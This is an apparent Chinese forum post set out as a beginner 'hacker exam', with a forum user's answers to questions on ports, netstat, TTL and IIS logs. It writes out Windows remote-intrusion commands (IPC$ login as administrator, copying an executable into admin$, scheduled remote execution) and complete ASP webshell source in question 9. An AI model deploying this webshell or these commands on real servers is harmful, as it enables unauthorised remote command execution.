发篇黑客菜鸟试卷给各大菜菜做做看(原创)
哈哈,本来想编辑个黑客游戏给大家跑跑的
没有时间啊
那就给各大菜菜份试卷做做
提高一下自己的水平
可别小看了这试卷哦
包括很多方面的
不过里面我还放了几个个ASP木马给大家玩玩
试卷如下:
[color=#000000]一、
[url=http://192.168.0.1/]http://192.168.0.1[/url] [color=red] 小3:网站IP,内网ip
[/color][url=http://xyz.3322.org/]http://xyz.3322.org[/url] [color=#ff0000]小3:域名[/color][/color]
[color=#000000][url=http://192.168.0.1/]http://3232235521[/url] [color=red]小3:这个我也不知道,应该是URL编码[/color]
三个连接指向同一目标网站,那么它们分别是什么意义?
二、
常用端口识别
20 21 23 [color=red]小3:ftp源端口 FTP TELNET[/color]
25 80 110 [color=red]小3:SMTP WEB POP3[/color]
139 443 445 [color=red]小3:[size=2]NetBIOS HTTPS SMB[/size][/color]
三、
试述下列命令作用
c:\>net use \\211.87.194.121\ipc$ “123456”/user:”administrator” [color=red]小3:ipc连接[/color]
c:\>net use z: [url=file://\\211.87.194.121\c$]\\211.87.194.121\c$[/url] [color=red] 小3:映射对方C为自己的Z盘
[/color]c:\>net time [url=file://\\211.87.194.121]\\211.87.194.121[/url] [color=red]小3:查时间[/color]
c:\>copy abc.exe [url=file://\\211.87.194.121\admin$\system32]\\211.87.194.121\admin$\system32[/url] [color=red] 小3:[/color][color=red]复制abc.exe到系统目录下[/color]
四、
试述下列命令的区别,如何防止该命令在本地或远程运行
c:\>at \\211.87.194.121 21:05 abc.exe [/color]
[color=#000000]c:\>at 21:05 [url=file://\\211.87.194.121\admin$\system32\abc.exe]\\211.87.194.121\admin$\system32\abc.exe[/url] [/color]
[color=#000000] [/color][color=red]小3:在XX时间运行abc.exe
说法不一样 第2个成功率高[/color]
[color=#000000][color=red] 关掉schedule服务禁止AT
[/color]五、
W3SVC日志是什么?分析下面这段日志。
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /MSADC/root.exe /c+dir 403 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-11-24 11:38:54 211.87.67.76 - 211.87.215.81 80 GET /HEAD 200 -
分析我酌情给分。
[color=red]小3:。。。说白了就是换了N个CMD功能的东西来列目录[/color]
六、
netstat命令有何作用,举出两个参数进行说明。
[color=red]小3:。。-A -N 说白了就是查连接 一般来查哪个傻子连了自己电脑[/color]
七、
试述木马的一些基本特征。[/color]
[color=#000000][color=red]小3:潜伏,破坏,复制,传染,进程隐藏,线程插入[/color]
八、
如何利用脚本实现对ftp的自动操作?
[/color][color=#000000][color=red]小3:这个网上有代码,不说了[/color]
九、
下面是一个ASP木马,请找出支持这一程序的关键点。
<%@ Language=VBScript %>
<%
Dim oScript [/color][color=red]小3:以下声明或者叫给个名字[/color]
[color=#000000]Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
Set oScript = Server.CreateObject("WSCRIPT.SHELL") [color=red]小3:以下定义+组件调用
[/color]Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form(".CMD") [color=red]小3:以下正文实现CMD命令,浏览[/color]
If (szCMD <> "") Then
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then [color=red]小3:以下写东西
[/color]On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
十、
存在IIS或CGI漏洞,并对脚本有执行权限,如何进行入侵?(只要求叙述到如何上传文件,其他思路会酌情给分)
那么,如何在不打补丁的情况下避免这种攻击的发生?[color=red]小3:。。。范多了 不打补丁的话 只能用权限设置来扼制了
[/color]
十一、OSI模型中哪一层上有协议?分别是什么?[color=red]小3:极度BS,上网去查,我菜鸟背不出来
[/color]
十二、观察ping命令的返回包的TTL值,可以了解到什么?[color=red]小3:连接网速丢包等和对方主机类型 当然TTL可以改
[/color]
十三、从网关得到采样
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3646
目标 IP 192.168.0.1 端口80 源 IP 192.168.0.3 端口 3647
目标 IP 192.168.0.1 端口69 源 IP 192.168.0.3 端口 69
请问 这可能是什么样的会话,采用什么协议,进行什么样的作业?[color=red]小3:HTTP 估计浏览A网中
[/color]
十四、谈谈你对hacker和网络安全的认识[/color]
[color=red]小3:都是废物[/color]
